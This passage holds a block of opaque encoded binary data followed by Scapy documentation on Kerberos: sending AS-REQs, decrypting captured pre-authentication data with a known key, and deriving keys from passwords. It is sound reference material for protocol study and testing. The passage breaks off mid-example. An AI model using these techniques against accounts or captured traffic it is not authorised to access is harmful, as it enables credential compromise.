zBn>s5d~69*5K@Q)dC?QT(E|^VaQb{xe%n_oH`+0BdP9C{zmqnS%ngkdz(iUzews4x z%}6Suqp+-W92@ro|59%B2st~prIe0996(g@fgLLl>gmev z?;g1G#hrYK7EyC9eXvjQ1b*2186IuUvBWlL71Rdfv%a9CvjmW&ExnOz_*KRe7hkHh z6jE`=pkN|AdCgH$T-JR7;I;?&>atRYbABY)+Z{#$$T|HFnzE-bMq9&zGEh z?8DnM4$z}!T7__PPH}!-kvcdY`H5*UU55!I<n6xtmzI)QEdkKr6#iR%$X?N;l8r zC`cTxBe(cg6CXdNT|kAW!6i+SrwC0O6(3Kqh@Jp=a@Z-Cp= z9MBA*{nZSm$P9MrZ0B^x#j^^5qc)!R7M0PLiy*29E|n@e>`sH2O19a?7fWCb1@ z_Kub*IHeb^^Z%?j2`2_~mxP`_w7i@(+LH|Ah1S-Ucxz8dS#O2Dt{ibueY$VscWDDj zd>j@Xj2G80ZigCa$RwgjcW-er_xV-a7d8avF=O0CfA&OE^$yd0e{wZ6^Zl-n{``Pi z5CmUAqn!Rd@%E4_S5mwye)ac_Aqi;6?9KK%ek^?R(TWjXM+rhvVQ@L@@FNh2It|zU*IaS5#PE$gF%+UrS!4m zW=1OGxT1(Avk_qTEBsa${^JtCyq8=Op9=>hqB337!5qJzzj^v2CZ;1L!;MO*l$9-S zl2UPIG5vqVFE8R=oNd#LM>9udp8QuzYlb)Z^q&D6O{0M2G+F3Px2y5Sh`c7dbiF+$ zIuQoLuSI~Ag(he`5f)zKv`pR8Qw&%())i-Tz(}M6*^v?+6Oiq~=s!sTp;EhZJyHb` zw~bOh_uC&d9EC&qk@a7T9wQ4Gk4iYDNU@PPI%yX6@It@~pz$-#Dp~7aw+gZSojQt{ zxQMV=!%c45Sl6_&#Y*`WZO0V?y3@s|X|tZf5)u-{clD-hI5=CkwQKK6p$4_cI{~1n zNZ=?DR#5mBxJJY5uxt-9z`9m?G3K?pHg_w&+(YWg^^xRcHkX&Wx-SNAFhnMs>#7cE z@40{6RRrM2>|6Q(eN*I1a+AQDW7`5ib7aojzL{QB4FDw2ej zmX^M`N|D6H_9)^&LXl%D# z_7Z>c&hih<25R*w@N+^~|nC6tbVxIfEMH=y~KRVPpNe$~6<0Ww&RX-^CF%H@C3p3PHT zmysao`|ke;e4SOE|s+2nBGFSwUV$gmK^H`h4pPprLcy5=Y@JlXWMAv;kLstcZ@EAJbl7G)C8rv-}J&MDJU)cXz-1z+e0D zvSQ_)sONa!@*eP@k^TxA{p+wELzlTTjOfqp#wEcD2A4VjO_WH z-nFkd;h%wTJkxfU^QQ%A4RB1qE_7hh_4R>GPsGL+f;%3f#^i=$C>||mst`Lx5eAI# zxPAPE0>XI@lUE?;3{oS($qtAygZFX;)qcPSYhQ>T$rRU@TTEItmUfSLF;*_j5_gv2 zZe|2(qDP%e-Wq+=t;>y-!|jI>SSYYufrmwggds|ajD&QV4RZsJ!3wJLfM*v36xXmB zUj`6iEoodG8ksQac&5F4trPYYX?yx{SbvNg1Zm`Op%R1^PxYOYczT=_)ANUa z$7Wx?G7^P|0tBP4I`g_g&lPEp1^Dpn!?NEG`e|!yPkC7=u9+vC>R+c0`aZA*XtFj&{*7ERmACyt?ZGXS`#nx}lWHApP__RPt4FvgM^ST{r7{Z@T_9;N}T}m`MWmF~FL3 z4&9RxG0N&W7SC_P7TLE zFRzR*7A>5pe4NLv7!TC`ARFWK7<7e(%AVRgY;CUO9r9BBE*xbUQL8dQeiX>}2<@n~ zuUyWYh}+MQhek&Qsc*7}OzjVr3T3sd@kn8S5xEM2WPWEjl9|WRCL=i|>g-A&E!zR& z7GdEHHsv-yA)QXhIfaFqoB+OctShsY6sOzzic_y%gKY|66BMe5b8SCB)pfb& zYxnRtad1Qq14E+d^eHtS?ur(Dug2e5bLI)I>@>m8R1&}dWeRMs;Xl8gY!qqT=J3k; z{x=}MQOB%_8Iu>C2ZD9!jF`lL851WYQ1?RhyNc@H^KWnbooQ8Nw>TZvZ6E^yN#Mkd zj*VPDmQS!x;sjuY=IH_WK|)uBECZaFf;+0%202*7?eV*wF9jPSQ|9nfoNL7dS}IugwQUce%~KC z7wKg@0cWIqcDQ5pYxPX8P7>*eNLY`~vrfP?QrU0&w3#lPFE5G60%J)@SOn8_BQBkY z4abs3)LMQ%TkDOwM0!q7A7@ysqA6R?n05f;cNMRP`lwvXbcKC85JBtY&Qz9?ZSsvO$6*)`6&H;sH6G$7xSvZGMfz} z(Duu={Pg+AJD|ngS?9KF8XM4a@6=_Uq_c`6l{R0IiF<%N|6|d zzy{H^*;?&d&v@`_u}_kehwObW!v#Z-(H$^}tl(!lmOoW&S^paHv8 zCHD^V6o2O`%zHvo6ADkw1@Mn$%DBrLqe9%tci{<(812y zSUNVkXuhWX3@a&@)`sH0b`OqItR1+(pTyq4Lt;|_Dt45{!t7PKW%TF0iZVRW2CLXt zO*p5>$jEO%o|Gtb`W%orP;Rnpdnm3Yi)QbGh9hbNmDzXPVVc=b5}z#|ELiK@q01oh zN_*|XB+MH0xGyJDA|^evfF#IMt1rI^{fcIt08yF#`qu%ACcY-vchJ_7dS_R_pkQ?K zM)GmjNsD;FhI?1M?28NBt}DTCU_ExXlWZ`8&6v<&_ta$d$z}UQSzY1k3g_42{c~H7=;0oV}#9B-Sz<`t|9~eSID^Yrl z?z&pOw0A{Bf<&`{&jzF9B5OH-Wt~1;TC96RZ(B$FXp>7+RbgttPE$vMx#wMOGr&Xv zOF*&y8T;}#S`e}IX?y1DZ9ewL`w8FmsIk3(ZCCUArt0Ft9MBqyua0J$TNAYL{~4Z# z2bZLTLfh4a@#g9%wh3V4y@>b##nL5#1` zdjdj9IAeA&AfE+%O{4V)HG8Yoj(rk0Q?qFwv*>(O;N7A0FGRa&<%|rB4M&2F@a?|| zjX}%qXPfTdDfL)7{N-4~e*bCr#ApCqnO?Joi>9o?y!j+$>N<$qBwa+DkN zrz@E>;PfZ5n3A)2C50$lOhi#?dCT2>2cfVAb<^2KFF2l8`-;_$t}6SQyPhTwuwaJU zF`mj64mVv`S{3lD+d@=3P~Hk}eAqwT9OGN8-iOqE&*vy&HXfn%-Py;lMXNWa`NsF6 z^p7#UUCe+!h|elgsyqSNhp0k^o3Z*-0ZV)c>~X20f6>k>Nj#S5We-1Qhi3bvJ$0L{ zYeNuZ$C@w-b7x5&Yc!V#+``DPtCRkyPY(KZlI#$23Q_)y3|$&TFn`;+8e5|~Iv+#x z4im#2(*EXJwKPcoZ(HUs=j1tPm~`(E1VGoJ#C@|W0X?y-BL640d>sD!&XBJp?1X>VQBw>Cwm~J$4N>DIRn?Z_TrxMp^2mH*Wjy$ zmot_3{R8e~iaggJUyJ_y537cs3+#!xq&+61Jx1DtR48!uUr2oTx8L*Er!90(vf#-5 z$7`T08OpF`Abmn2My~L(Gb;n%r~nuBYW;l`us=r4qbMwSHMXXT z%39dxz;;LQ`3@uXWw0okkdlL`dyV_Wh6gxgb#>^BrveVx3^bCaP4O6@HkK3sDaL1s zrI%matN6Yb78E;_={L(DVxmYP0ugmnNLK=Wv0}jxVNfF@d(S9iXKR~tU{d%)0Nto* zHf?9?gp;@PJlm$u2pr>TPk;XZMN-CrAlSxdd4|vNei>&Z$3Z{lIUU1~riX)H+1a|=I^?^b$)zGz<}#4KhZ3S% zU=2K&AM~}_ir;YFo61Ens_!zVQA!;7p{fhTn7;lN9`1o}u2|`#D;`tAs=ixFArVX^ zuI{t@jftfzMGW3jJ;n9GnUhx`ImNkwg)?<$yOy(QBgyS1#V+-R|KjdOO>cNSLR#9< z`KG}!`KI5eInK#6#8(i{;%0jFWK_O6#`%bLT~nQAO#AcZx!3Qc2bxm5QXB2lYftrx zW|`t>rS(;K3N5p-z+tOZ=VMmQTvqFaM&Ec#iOSvSywAMLb5z%%+cFdsJlwB7>#P>` zi)&g7FNv#9L3F_TPR!3Rf39bVE!2GRZeNnusFE(|t^q;L_WBm5(S9pLSVclanouEq z)*c={APjr>$yi2|Xdk5V3k!B2obuTs+9wgC7jktZQ|QG(--< zC7;6!CxJ6iGv5Z>3NNc}M=Bc8r}PtFJSTk{+}_cXFwLLhFQ*295G8x;T*%fLS*o+e z)-l;bHk-c`UE3Kz-bk#wvgoJ54YI5?*C`ihOAQ2J3+;vK6oe7-dp3TAsj9!_l_qUt z_W0^n(lw~}i(kyJa!_M}R=qpiQrEu9MknjyZ8LpLD$QgOS~1&?B{m3W?Fn|_y-f%R z;XL_#Z1J=XW!I?c0VUm0^haW<%uuC+;e@G?G8Qf_E`mdO->6El+qLWPL_IP*-0Ek% zjh^x=mag7jrP}&TqAdK$E32uBsx@fy8$b6uI)w&}@NOsro?b0lMse|v#ryh!t}Xqp z0V@9D)6=t-xpK0j8~rzHyb;kmlP}pz*ii)~N%Z#4XjgGq8l8+6%DEn|$wZG|P2)+A z_nhBJ!eD-cM}MfB*uzL^{+9gWZn5{I z$!PqA00N@nCFu*WhcWiB z*m|ZKUO_}kL{JdjLz9m-A>M9hfbKoNol1o*=CBWTk(T$)R4zj2@$pGK+i-GB7M-k| zTyw1^#XcYH^p3bGE#hVPGVJ$sB{{?|Ahh~OBi<7bew2_1f<}qLkR}O)^iD3ye`t6r zg`1#bZrEEATh>eCt&IA%7Wp7PNLEQnj{DB-)j`Hhe9BUCre!|+T+Kx-lHS!cq34$m z9*t?z{WB&?W5mv9Mnv}?*2JTalDP3;`CwUDSxc_c(K)myE@;H_MuUIeq1Ox=6l~hV#=u{dJq`OPHyHSwt&Os!k8>E%)8e+(yJER-V=J{Xe`aRck&hz4& z`wcI+VXnDn@9+Aq&suxU=nN&u^^R1TSw`Ks&CLrO%_pNZILu>QH`7K}nb25w`K5eX ziyNe#?rn#KgrLjLc_=FR{|!+1sA@nO&eN%-`}XnaR%CLyL0UT9=BHn-Cu~0+N4}Gh zi6?iSd!luCx&2iwHRx3?PWfr?Kwq0vKRcu5Eh;`fe!XLrYC#y%GC!^DZX_a!&$vdR zPK)`sDgPG z+qLMUK`&IhgK3(@&`*~z$BK$dR<796MwTK)=)!oa8T|K8t=0U@k_f}Z3~*9CHkCmz z*p-npgxH;9V-kjz-pl)um^Iq}C{I#K=8b9!E-o$wa}HMKQ^yk?T+bjh=H+3zQn~&; zJ(%*7!<6*cflZ9yD$fg~zV6}$r)qjS`QI)W0=JuiR5U5(o1^+bptVTqQgbS0(ui4f{LF%+W! zw#C|bdULzGMK7e;u1|E`lTZ_x=ekL~t=ZpML6xF)N7d-sjQaJTSLc*jqH-ZIKj-BG!s{Oj1s^mKJX$`re*M{3t7j&%pqX`SZeZ$ zrQd{KmOpmFth+g6n4O_4Aj8Mc45HN82BS~KR^}I|LV&ehadoCb(-l4ae`Wn%jnC>ChA}e52Av~xhxw14K`h~fp zS4*KK^@uXC>X?1x*m|xGB*nEaE>E5TiM3-?xyAobTF*?28J^7Ifjff6y3*MFUHW2Zy66n+%zO{U-RW0#zrT<*D~OLAShIBH9!#2 zNxE#iGSo5pWV+e!s^^Sobdu;+)@C=5>hN=1JuF|*Og>8)s{uo&ghySvGT%e#_lb&Fl#Zo-i7VcgE^*u(%Q;Wsm}DCjMY_W45`s+49(Bes=T zr?^6?toEyv>#m@@QbL|Oo>`ys%%tK}2W$-&i@w@etrrsrl$p0hC^P*OYs0ypJ={I7 z@OPPJ3`e^k`A$FPC})9mA!Z^)QqN)!u6dd*5^oT_N6ludeiKHQZS^>?Eb7_+5VWiT4!EXR%_?#cA2U5V1+M! z)xL3fE%Yr4Tk^(<4i0WjqH}~wm3`St@4l*fonD<@gWGyS+5SLQAr0u7M_EB`Z}HKG zjf^Z_NU*RZL`BI(xDdZvU0rAGaG)nnN$Gd+YEm_;I+7H}B#y|U*0_Q~Osl^;<(9D1 z^d>}II_o3z-qA8Zgm~kffZPQS6{v`uL9{O&x5ZlPVCa+BaAHaL2n$%c{_1Syyc|Uq zL1#rB>{hdJ=v!N1-_b#YM-6@--HZssu zPcq16$mm@PyQna$$?vVw;?hu=Ne^C)PTc>k)!OO^oh3xC z(XF}p7*#4nPhW7nIimUJw5@-i$Kjkh4?A5{L>swwf3;k8hZoN3QGx0{ellE=Jpg}Y z804|JvSGL&+^!C6OMiq{!;?_%M?s0|rS;_Vl?02`p0Ap|@s0dl)oc7@l71wP4x;TSS@66@0fP9Y~x%=`=$c-?UZQLchVyU^x2Z?m9eC zQU9QdwKlsrfX2yug1{0JGyK=H=-1aMOed)CG^JD1TFmYj;|F|%4dPx)_7{s$<=E6; zDX!OLscJ{&ICwp8zHHBkpklZ>G1>m|#d8tSg_otiR2v5zJ2!V3Seap=S zNuZ9m9eBKLWe=FMb93zP7Ms|P94@Af1q&~eTif>Mzj}Z@{b4=A+1Hare{?trSOO$_ z)aUb+gm`4QJ<}8ue>X}c*v(9@Ym^`U1`#bOISCzNcS^>0^!ns2c@954MCfE|jG?A# zdB9z}#epjNV8l|p8qI5Nvd^-8i=Br?{V)9^IW;xv{{HboZRprB9Z(aHbbln~Fzp_g z;R?Xo_0m_Hj4CeV!~rjOY*#WXSsz>;-8kRjcv3S~s2vG9W)};Qx|{F{3iIQqX!nK9 zc2R6WU$4oP>(c(N#5O_kJP#8ZPfX1`wB``wP^!^2;jKpP6;%5OA*s5}{0lhY`f*_4CnTW6ITB+}Vmk-)tg2>*D3aDL&NH2gF1?E`v7olT~lS3w~{vii|sz~03t z-zOf!{i1d)?{-tF-!R5RyKXWfMZy&7F1t9wglwMr?oS&t>g>wM%i|mb(*eS+%Ii|5 zSdRr1e`Ccck44(daxAHDk{P2!_EWl$j97Tc*l?-5iFfnXALw9)>N_hAP0KZ#(VNpH;+8N`rhXC zfXYYr+t)AodB1>&u2E|$=J!#21E)^&tUdH|9cWuN+caBsZqvd=?&NV;apeZv;{Bg( z7HfD?ef1X7QoVae75sI(oYVKENG-vtTP~AE`UV?X5!NFE)?z)Xu6`_u3kO=UD7= zDztMqMA%FDOHkxEg{q|Sc*X$X03qOW`)_?wQ3@&szEB?NH8i|{H~DXX9Q+87f-GJa z@G6fKmIUfJH7Tg7fz3M7*{YE5QLfm4mDc1b3$MlZp#RnzPj7e_fme3#V6nDxh(MF1 z?TazwD3>PzVq*Se0%2ce2>J5{^*^aS`IM0h`(7JvD~sK**PpTTrQ_s)<(5`H!?C>*f?~bk}M|X08W)gwt0E%S^0k+DV@ zg)vI=RnpciZ}LGe`Uv&REklNiI$G;M)?EUPrD->J69Wk_KS5tppt14i!|f9WCAm`H zE*EQV=gl4f9{R8Ku`FsY4V4fu!0To0Eq>L&)N|_2jnE30YnL!4%Jw+DS#{yH8NBZ4uF#6~p(V6GC~# zabsN@%9Bh#0tCsQZWFWF!5^)i_Z#LR2vAakqglZ_IA=A*4;3JIxNzEpx)*8!#gdwaJQea*H_tqa6z7;__ zU{ftr2=AeyTVgZgerxYwSGL(JxsH=%761*>Q}ZDVFuZBr>C2tdG?g2QN=DSN_IZHq zoWEhZJzN_Y+iLG^oXloVDf{E{NCxWX%O9bM;UOmRO4{UVc%X)1Vwd+|xBdHdp0Pzl zr|6QPJ}*6eug6Y&RMdHyyp*?E#7haVod0z}?^R)uj`A;n91guZwZvsol9Hak8Y>9} z(f;QO{uHcghp5+Zd3E|R?OB9q~JG+rO?x6h#RcTAo#$2`?)&KKFCzV1&Pa z`yHAY8r1*at{6$(OzMBT;zaWwj8PBeyOyeF+3tw#Vek_SWr^5WSYA4H+8k;8S*vwp zDsHI8e>karQn5BoF&U!mG8ciFG*!dMIv_pC4C^0E11cwW1WuplL`5jSwa}QZrMxvB zZU#*TY_3@tbLnK89Q{&%FkJu;A`ksMGSWjZ<9)hwW$aVFt=n?JH^8U)JamY<69k`T z;)%e$!HB2H{9)M*V3sPQkVsyH+-r$K>-*1}=A{db^?XkC7XfZZkMb(%0vOTE_xRh~ejUXqmB+zCm z-!PW~*s$@&69u~n@$p5NTjGQoch#R7r~t6D_?Eqb4R-@^*})Z;7r(8x%XU9Ug2$LU z0DUjMX7MT3;4JI~mkpw|zlKKh)KZx{!*=hvm&8e4Y%EziDtDRPq)ARmEu}3D(+*P^ zc%f};DmKQ>ikcc>-m8iI@6H3$Rp!ht0$Vl1Umxh6tasP2B=nz{bP8i@%*w)bS>@_cc5y)XUB1*yAlXjxR45k~k+Q7J+>BL9;@@-8HiBUHs6pvyTc(xgoR ziL%hu&#;gaVIG4svaX-a(F>jYR19C8i)Y@%IhDaO*|ynfI8Y+RAQ$sqf_7JiEW;eX zyM|Qr>pckDtCo2Ym<^{jY5XtRqDotg3la;<9;gB)1U%j040Mu+$LlFT4;?!h%{ob` zHPqfdPk*FIRM_7T|Dm0rH3%|WS($p|Oa>pYz9R!q=OvdA6wG5rawE+kLNq{Zrb%(J zIt?t0+q4jF#<{469t_-$d=E5{L#OVS#w)NiN{c^5Pf7D{!fTKtwB6CWvQ9}?g+(d( zywPb-9Z69svCwO192)DMd4IbntK>duZP5})s~K~5D(&pACWa(BDAx7bU!6YMTRG2o za(HxffVkvsj)4nMiMu*J+A=p6P2;8|Wr*rY+FA{n`L)^ZFJ7+i_Uyr*_gc-Tg$k29 zcgjA@qSW?Va{P0aq_*k%wD5ZyJHDLw{PtL^alOYNA%Mcu-;onK+v~G=)j|EL^qPnWsp(bmy^$r+OL$k`oT4L;rpqXHS*V#O{ z#_Ib_S$W0#PpU2a#t-z=e@8y0;C@~lqJcD9?-A-;JpJ$xPNt!uL7m6{@a5vQnO5^{ z0{Rxd>FDqyO>kbZDNS1krz&J&*vfTC%fF!Du$*j9pfPgqv-?=7Hid6Z@wDyw{C3ce z!G&AwFx3@n!Q{J*sQDV%p*#0z6WRe5F00`B6k@}`Fj_X|g7)`|2rv!?2Q~)NF|YniG~e;EGq&OJW_Z-t1%)qjEKjcw0%DRys7 z4*~}!`G2932~=Efu_sw!WtJBdN=ix_qa!-`Y!AbZl73eUc^mGDSYWDV$x*YtZMH_dxfYXtPB;h%T~hhTuaULAA|6o~fGnGRjNy4DAKWqL zU_BfOjJ#Sq4iMF7_VhJ2GJfX0^csk_9WYsUOn&HZcmCmju>fs*2S+@6co-iDgc_K% z2tgZB4x7n(GNG0H(9+Oj;(e8B7ihg+Q0(yh-kG` zHFMHXAac-Id4e;hE3W_siDymA%RdNty;MyOrosG5WGr=I)ec_NgT+VvPWLoJR3`17 zY5M4?)e1^qC+G`hl8De^FGp(npgS8+XH&PckG59vfH}?2Z+-X$HC_k)7t;5g1w#Xu zW^?^t_M{MKJxECwS~!C6b)@sw(yZ}`$093!x-ihL`eb9W~H z+Qqfz*6&F$q>=XcfA!6aT=|zS8qYy;>;Q+ip0Dc|E)4|z1VM)7hoy30zAUSmX}|we zY>;fwt93D~aAJ1Rh8X9%-V|NA-x+010AGOl#RK-~7*VQGfdwH|#ahBkii_#{r`KN| z&Jwr}|EUmQlF>vO?r#s{B(Q?Fyz+mEKspViSQsvcf(dzFe2e`)k|^3!JKG59=0>KA zqd1+|uN%)alO1m_`q!tV*!CN?KAqT|^#x(*TSJ7&nyAZn#j1)bgT4$sdk2R)?`0Q| zT6GWfF}T#*08D~gN$bvHbSMWvU!~z4GcDGgZ2om4B^zgqyVI6|(YgEM;+pp|j9}{E z+3E7|+KmyvPXtKWd|lIPtVcpDe6Bk|yGi%J0F7zaV*n0A;w!W3Jt&k)Pl>_>ZQ47v zQ+wXNUReLBJ7ivDf`o(?bpIUzzW}vq##d@ckpp4z8g)T+!xV=J_O>wva)7-xA@hd#(Ge| zbgq~QA#1M>9H3=O8G$9lCrKnVV|VjlSGB6vGE#~P@7?v(%`2*jp%#OcW7gvrJ3-08 zZv=Mgk&O|M92|15=MJz0&|a&D$geC5`y?h70BR)qBeQA74;V}leZ=6&0}eK_-9$-k z`4;#W(^b8mctmN1{U7^3&PRhx`iRu~lA#QR=FT;!&eeQ-q^PDAgEa9zsU`|+L>DlUjE{OZPDI|D6 z4LI4nIkv3d$IkDDf%sW|>x3&1?={iJ+(DY#-)N_$h_)~Iq5fX7cv_v`bJTHA*U5{t zT8L*(CzM9qYI6vrTw?!Tn7u*e{07RBk1A>FAroHwC~WG<7j7N@;#vhS#%D{ul2y`q zWU6Xo?|zsD8~NL>#6j}*Ev5e?QqoTGy}VgYXMzXm%QF4>FTjwkh0$^8D%0tY-{+-a z<1<-`>ZqU&)LgY64BG#`x?``{O&gL6+)8h9x@iIcjqA)F_7dT1P?~-}A~V5%D6ZPe*;ugZqfjN0$ncB%~!^#DGJ$EsOT)*cu(lIBLmQ zm%7ATOaTuIr^bw;;ieYPi!CKe#6x#|9Kf@U{|e7aPkEXyF*LT`!gVl9rg@wfx({q8 zZp$8rqZ6-|N&!*{r&r9J-&=* z1I@ZvW$iZkWn;O(5PE!dc3|X;>4r;2bV(rp-MLVt9Z2u}LUgn-+M~lRlvt|0R#^aj z!+#Bq-b!3n<~i<}qWbD50?e*X*zF~5Z9O>ol&TSOV_IhN8 zc$TI%AqK<&kP^MIh3M8vl5&q+_Lx0dP#M8gvALG|o1w1sDEdHNjlB}2n=^2ixU;$c zq-2Ljs~3gY%K7c=_hpEmM9b&Bf6Czk%D4cOa+k4I^&{@{xwOU;lJ;-fBt5-7oqgk# z@X+r61Y@OtANtrX3j!tQUXPJ%;g~xil*WEaV%`uNuc0o8kIGarm??_1d=u8N3#Ln6hD3sT z2&g+gd4kniA~NN4d3>Q*bTw^%wy15dv+{Sjew_Qp3aTjOr1~-z$6a)9LIB7th;smZ zXw=QIB)0q74U+PZM|@O~l>5sYM#7m30K4z65}gCXVS4cfd>^|v;ec}eb-Q_Ni8&<> zC|(2B-gj`%#x^+NLyIJm7pAwn<{QJTOZg9)!`}`AS(dH#!nd=2v7F`w!9G`UkYnKv zrYrEuyw(=FFUtY8DoCRQj=`>!`+{9r=en!FdbJWA3vcu&TFi=?*$M>Uk6S_uyz1V6ASW0Dm#kR=8w|$NhR}{Si3|3NM4Cf<5_VuCf6g5Q7C4 z%B;xf`1Fo6nxjW&%m0OFp~{)inpBmSF-|tU24H+sVTEwlYbm?6DxINpE&qO6oh*dBtj zUS+JPJMt)TdAT;OXy>Dn@_5n$8&+lF*8m*kz{UFE@VCudL7-VcrC*cYGg-aP8?ym> z@4*UW66>pb7AOue-|e_lPA~v%ZV$Z)T)}a>?lw^LX=fxiz z2OB*q=JG|;R((hB|H)UTf5x0eH%V2~k0YXJEG(wL`^LTb0n8HnOj|5U8=Se z1l4#vd+sH0I`&ZWzr%A1c-tDMEsdT&i{g?d`C}?%3qpoLtztn-+)@)kB%XQy6qg#Wa&Xz z**a^QFohl$8`_ + `RFC6113 `_ (FAST) + +High-Level +__________ + +Scapy includes a (tiny) kerberos client, that has basic functionalities such as: + +AS-REQ +------ + +.. note:: Full doc at :func:`~scapy.layers.kerberos.krb_as_req`. ``krb_as_req`` actually calls a Scapy automaton. + +.. code:: pycon + + >>> res = krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", password="Password1") + +This is what it looks like with wireshark: + +.. image:: ../graphics/kerberos/wireshark_asreq.png + :align: center + +The result is a named tuple with both the full AP-REP and the decrypted session key: + +.. code:: pycon + + >>> res.asrep.show() + ###[ KRB_AS_REP ]### + pvno = 0x5 + msgType = 'AS-REP' 0xb + \padata \ + |###[ PADATA ]### + | padataType= 'PA-ETYPE-INFO2' 0x13 + | \padataValue\ + | |###[ ETYPE_INFO2 ]### + | | \seq \ + | | |###[ ETYPE_INFO_ENTRY2 ]### + | | | etype = 'AES-256' 0x12 + | | | salt = + | | | s2kparams = None + crealm = + [...] + >>> res.sessionkey.toKey() + + + +Low-level +_________ + +Decrypt kerberos packets +------------------------ + +Kerberos packets contain encrypted content, let's take the following packet: + +.. code:: pycon + + >>> pkt = Ether(b"RT\x00iX\x13RT\x00!l+\x08\x00E\x00\x01]\xa7\x18@\x00\x80\x06\xdc\x83\xc0\xa8z\x9c\xc0\xa8z\x11\xc2\t\x00XT\xf6\xab#\x92\xc2[\xd6P\x18 \x14\xb6\xe0\x00\x00\x00\x00\x011j\x82\x01-0\x82\x01)\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\n\xa3c0a0L\xa1\x03\x02\x01\x02\xa2E\x04C0A\xa0\x03\x02\x01\x12\xa2:\x048HHM\xec\xb0\x1c\x9bb\xa1\xca\xbf\xbc?-\x1e\xd8Z\xa5\xe0\x93\xba\x83X\xa8\xce\xa3MC\x93\xaf\x93\xbf!\x1e'O\xa5\x8e\x81Hx\xdb\x9f\rz(\xd9Ns'f\r\xb4\xf3pK0\x11\xa1\x04\x02\x02\x00\x80\xa2\t\x04\x070\x05\xa0\x03\x01\x01\xff\xa4\x81\xb70\x81\xb4\xa0\x07\x03\x05\x00@\x81\x00\x10\xa1\x120\x10\xa0\x03\x02\x01\x01\xa1\t0\x07\x1b\x05win1$\xa2\x0e\x1b\x0cDOMAIN.LOCAL\xa3!0\x1f\xa0\x03\x02\x01\x02\xa1\x180\x16\x1b\x06krbtgt\x1b\x0cDOMAIN.LOCAL\xa5\x11\x18\x0f20370913024805Z\xa6\x11\x18\x0f20370913024805Z\xa7\x06\x02\x04p\x1c\xc5\xd1\xa8\x150\x13\x02\x01\x12\x02\x01\x11\x02\x01\x17\x02\x01\x18\x02\x02\xffy\x02\x01\x03\xa9\x1d0\x1b0\x19\xa0\x03\x02\x01\x14\xa1\x12\x04\x10WIN1 ") + >>> pkt[TCP].payload.show() + ###[ KerberosTCPHeader ]### + len = 305 + ###[ Kerberos ]### + \root \ + |###[ KRB_AS_REQ ]### + | pvno = 0x5 + | msgType = 'AS-REQ' 0xa + | \padata \ + | |###[ PADATA ]### + | | padataType= 'PA-ENC-TIMESTAMP' 0x2 + | | \padataValue\ + | | |###[ EncryptedData ]### + | | | etype = 'AES-256' 0x12 + | | | kvno = None + | | | cipher = + | |###[ PADATA ]### + | | padataType= 'PA-PAC-REQUEST' 0x80 + | | \padataValue\ + | | |###[ PA_PAC_REQUEST ]### + | | | includePac= True + | \reqBody \ + | |###[ KRB_KDC_REQ_BODY ]### + | | kdcOptions= forwardable, renewable, canonicalize, renewable-ok + | | \cname \ + | | |###[ PrincipalName ]### + | | | nameType = 'NT-PRINCIPAL' 0x1 + | | | nameString= [] + | | realm = + | | \sname \ + | | |###[ PrincipalName ]### + | | | nameType = 'NT-SRV-INST' 0x2 + | | | nameString= [, ] + | | from = None + | | till = 2037-09-13 02:48:05 UTC + | | rtime = 2037-09-13 02:48:05 UTC + | | nonce = 0x701cc5d1 + | | etype = [0x12 , 0x11 , 0x17 , 0x18 , -0x87 , 0x3 ] + | | \addresses \ + | | |###[ HostAddress ]### + | | | addrType = 'NetBios' 0x14 + | | | address = + | | encAuthorizationData= None + | | additionalTickets= None + +You likely want to decrypt ``pkt.root.padata[0].padataValue`` which is an :class:`~scapy.layers.kerberos.EncryptedData` packet. To do so, we need the :class:`~scapy.libs.rfc3961.Key` class. + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import Key, EncryptionType + >>> enc = pkt[Kerberos].root.padata[0].padataValue + >>> k = Key(EncryptionType.AES256, key=hex_bytes("7fada4e566ae4fb270e2800a23ae87127a819d42e69b5e22de0ddc63da80096d")) + +The first parameter of the :class:`~scapy.libs.rfc3961.Key` constructor is a value from :class:`~scapy.libs.rfc3961.EncryptionType`, in this case ``EncryptionType.AES256``. This is the same value than ``enc.etype.val``, which allows to know which key to use. + +We can then proceed to perform the decryption: + +.. code:: pycon + + >>> enc.decrypt(k) + pausec=0x9a4db |> + +Compute Kerberos keys +--------------------- + +.. note:: Encryption for Kerberos 5 is defined in `RFC3961 `_ + +You may want to compute a Kerberos key from a password + salt. There is an API for that described in RFC3961 as "string-to-key". Our implementation is a class method as follow: + +.. function:: Key.string_to_key(etype, string, salt, params=None) + + Compute the kerberos key for a certain encryption type. + + :param int etype: The EncryptionType to use. May be any value from :class:`~scapy.libs.rfc3961.EncryptionType` + :param bytes string: The "string" bytes to use. This is the user password in almost all well-used cases. They must be passed as bytes. + :param bytes salt: The salt bytes to use. What value to use depends if you are considering a MACHINE account or a USER account, for the latter, it's just ``the concatenation of the principal's realm and name components, in order, with no separators.`` (RFC4120 sect 4) + :param bytes params: The opaque "parameter" used by string-to-key. The RFC defines this field in a very general manner but it is basically only used in AES, in which it is the iteration count as a big-endian int (``struct.pack(">L", 4096)`` by default) + +Let's run a few examples: + +.. code:: pycon + + >>> # Get the AES256 key for User1@DOMAIN.LOCAL with "Password1" + >>> from scapy.libs.rfc3961 import Key, EncryptionType + >>> Key.string_to_key(EncryptionType.AES256, b"Password1", b"DOMAIN.LOCALUser1") + >>> print(_.key) + b'm\x07H\xc5F\xf4\xe9\x92\x05\xe7\x8f\x8d\xa7h\x1dN\xc5R\n\xe4\x81UCr\x0c*d|\x1a\xe8\x14\xc9' + +.. note:: The following example is from https://datatracker.ietf.org/doc/html/rfc3962#appendix-B + +.. code:: pycon + + >>> # Get the AES128 key for raeburn@ATHENA.MIT.EDU with "password", with an iteration count of 1200 + >>> k = Key.string_to_key(EncryptionType.AES128, b"password", b"ATHENA.MIT.EDUraeburn", struct.pack(">L", 1200)) + >>> print(bytes_hex(k.key)) + b'4c01cd46d632d01e6dbe230a01ed642a' + + +Decrypt FAST +------------ + +.. note:: Have a look at `RFC6113 `_ for Kerberos FAST + +Let's take a Kerberos AS-REQ packet with FAST armoring (RFC6113): + +.. figure:: ../graphics/kerberos/as_req_fast.png + :align: center + + FAST armoring in AS-REQ. Courtesy of Aurélien Bordes + +.. code:: pycon + + >>> pkt = 